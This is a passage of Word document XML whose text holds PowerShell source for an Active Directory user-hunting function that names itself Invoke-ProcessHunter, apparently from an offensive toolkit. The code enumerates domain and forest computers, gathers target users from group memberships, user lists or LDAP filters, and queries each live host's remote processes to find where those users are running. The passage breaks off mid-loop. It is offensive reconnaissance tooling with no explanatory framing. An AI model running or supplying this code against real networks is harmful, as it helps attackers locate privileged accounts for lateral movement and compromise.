    <w:p w14:paraId="730A0FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64091107" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4ADF3300" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB471B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787AACAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F6229" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3BA5755E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55947302" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D0817" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC3790" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FEC8E04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41110F49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46844992" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C074F03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F124A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D5F74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18E38BF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CECED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9A366A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A262CCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159128A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CD0B43A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F0C0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E6003" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # First we build the host target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD60E5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1ACE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82C65A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23003999" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're using a host list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE6052" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB21D67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EDCAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35048DD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0AC19B3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D46DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B441547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DF116D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65060BF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34062F71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56CFAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A0094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A51AC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = Get-NetForestDomain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230175E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13D896" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668AD89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D63FB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @( (Get-NetDomain -Domain $Domain -Credential $Credential).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56BB8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065DDEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EFF8E83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B0104" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32F6F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038DC42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066C636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CEF7BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02B346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA46550" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF8295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD163C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED6E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A21CDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E3A37E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F8F28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA3BD22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Now we build the user target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BA5C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32C63D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EBE5EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EE0B827" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ProcessName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0557BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "No process name specified, building a target user set"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03772E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35FFD5CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # users we're going to be searching for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA4596" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetUsers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C47BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0528D2A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we want to hunt for the effective domain users who can access a target server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A257ACE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($TargetServer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4DE2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Querying target server '$TargetServer' for local users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BED57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453CF4A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ($_.AccountName).split("/")[1].toLower()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E828089" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89E7C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CA4BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we get a specific username, only use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698C764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E263446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Using target user '$UserName'..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB03F76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers = @( $UserName.ToLower() )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F907F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D73113" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # read in a target user list if we have one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882970B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($UserFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E965A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC82CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74626D26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($UserADSpath -or $UserFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F024EFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169CB68C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Querying domain $Domain for users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513D7BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547BD42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3459C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }  | Where-Object {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65081A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F49B00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB0267" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7F420" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED3DC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267C014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential| ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71408F5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.MemberName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8C34B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8EC4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D96C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDDCCC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E058D2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ((-not $ShowAll) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460557CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "[!] No users found to search for!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606419E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491024B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C490F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E6B851C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE7A02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB7BDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $ProcessName, $TargetUsers, $Credential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB9EA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A9276EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # optionally check if the server is up first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8A75A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B691851" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D68F34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27408513" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DF2CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098BEEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # try to enumerate all active processes on the remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE147C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # and search for a specific process name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138AF090" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Processes = Get-NetProcess -Credential $Credential -ComputerName $ComputerName -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B8D4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BA84CF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Process in $Processes) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529C7318" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    # if we're hunting for a process name or comma-separated names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F84CBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($ProcessName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4D384" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ProcessName.split(",") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64533529" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
